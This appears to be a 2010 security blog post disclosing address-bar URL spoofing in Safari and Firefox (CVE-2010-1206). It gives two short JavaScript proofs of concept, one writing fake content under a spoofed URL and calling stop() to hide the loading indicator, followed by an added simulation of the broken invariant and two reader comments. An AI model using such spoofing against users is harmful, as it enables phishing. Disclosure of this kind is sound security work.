
June 22, 2010

Yeah, about that address bar thing...

As promised, here's another interesting browser bug, showing the perils of being user-friendly.

You are probably familiar with the usual behavior of the address bar: when you click on a link, the browser keeps showing the old location up until the new content is retrieved and actually replaces the previous page. Only Safari behaves differently, always showing the new destination - which I think can be deceptive:

<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
  // Open an empty window and put our own content in it...
  w = window.open("", "_blank");
  w.document.body.innerHTML = "Where do I come from?";
  // ...then start a navigation: Safari shows the destination in the address
  // bar right away, while our content is still what the user sees.
  w.location = 'http://1.2.3.4/';
}
</script>
I don't like this behavior, but it perhaps does not constitute an outright security flaw: the spinning throbber is a weak, but visible indicator of foul play.

But to the point! If you look carefully at the remaining browsers, you may also notice a curious exception to the rule: when a link is opened in a new window or a tab, most browsers will put the destination URL in the address bar right away. Why? Apparently, usability is the reason: doing this seemed more user-friendly than showing about:blank for a couple of seconds.

Alas, this design decision creates an interesting vulnerability in Firefox: the about:blank document actually displayed in that window while the page is loading is considered to be same-origin with the opener; the attacker can inject any content there - and still keep his made-up URL in the address bar.

Well, the spinning throbber is there, right? As it turns out, you can make it go away. The harder way is to use a URL that legitimately returns HTTP 204; the easier way is to simply call window.stop():

<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
  // Open the destination in a new window: Firefox shows its URL immediately,
  // while the about:blank document (same origin as us) is still rendered.
  w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
  // Before the real page arrives, write into about:blank and abort the load;
  // this also stops the throbber, and the fake URL stays in the bar.
  setTimeout(function() {
    w.document.body.innerHTML = "Fake content!";
    w.stop();
  }, 500);
}
</script>
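As an added illustration (not code from the post), the model below states the invariant the bug breaks: the URL in the address bar must belong to the document actually rendered, unless a visible loading indicator says the page is not there yet. The policy names and the http://attacker.example/ opener are assumptions of the model; http://1.2.3.4/ is the placeholder destination from the post.

```javascript
// Added model, not code from the post: a small simulation of the relationship
// between what the address bar shows and which document is actually rendered
// (and scriptable) in a window, so the invariant the bug breaks can be checked.
const originOf = (url) => new URL(url).origin;

// Policies for the address bar while a navigation in a fresh window is pending:
//   "blank-until-commit": show about:blank until the destination actually loads
//   "destination-early":  show the destination right away (the usability tweak)
function openWindow(openerUrl, target, policy) {
  return {
    rendered: "about:blank",             // document currently displayed
    renderedOrigin: originOf(openerUrl), // about:blank inherits the opener's origin
    shown: policy === "destination-early" ? target : "about:blank",
    pending: target,
    loading: true,                       // throbber visible
    // window.stop(): abandons the pending load; the bar keeps whatever it shows
    stop() { this.loading = false; this.pending = null; },
    // the destination finished loading and replaced about:blank
    commit() {
      this.rendered = this.pending;
      this.renderedOrigin = originOf(this.pending);
      this.shown = this.pending;
      this.pending = null;
      this.loading = false;
    },
  };
}

// What a user relies on: the URL in the bar belongs to the document being
// rendered, or a visible loading indicator says it is not there yet.
// Returns true when neither holds, i.e. the bar is misleading.
function addressBarMisleads(w) {
  if (w.shown === "about:blank") return false;      // makes no origin claim
  if (originOf(w.shown) === w.renderedOrigin) return false;
  return !w.loading;
}

// Replays the post's scenario: a page opens a window to a URL it does not
// control and either lets the load commit or calls stop() before it does.
// (http://attacker.example/ is a constructed placeholder opener.)
function scenario(policy, stopBeforeCommit) {
  const w = openWindow("http://attacker.example/", "http://1.2.3.4/", policy);
  if (stopBeforeCommit) w.stop(); else w.commit();
  return addressBarMisleads(w);
}
```

Only the combination of showing the destination early and a load that never commits leaves the bar claiming an origin the rendered document does not have.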

Reported early April, CVE-2010-1206; Mozilla addressed the glitch in release 3.6.7.

2 comments:

  1. It seems very similar to this => http://lostmon.blogspot.com/2009/08/multiple-browsers-fake-url-folder-file.html
     and it was reported before :)
  2. Not similar at all - SOP "spoofing" is not a big deal.
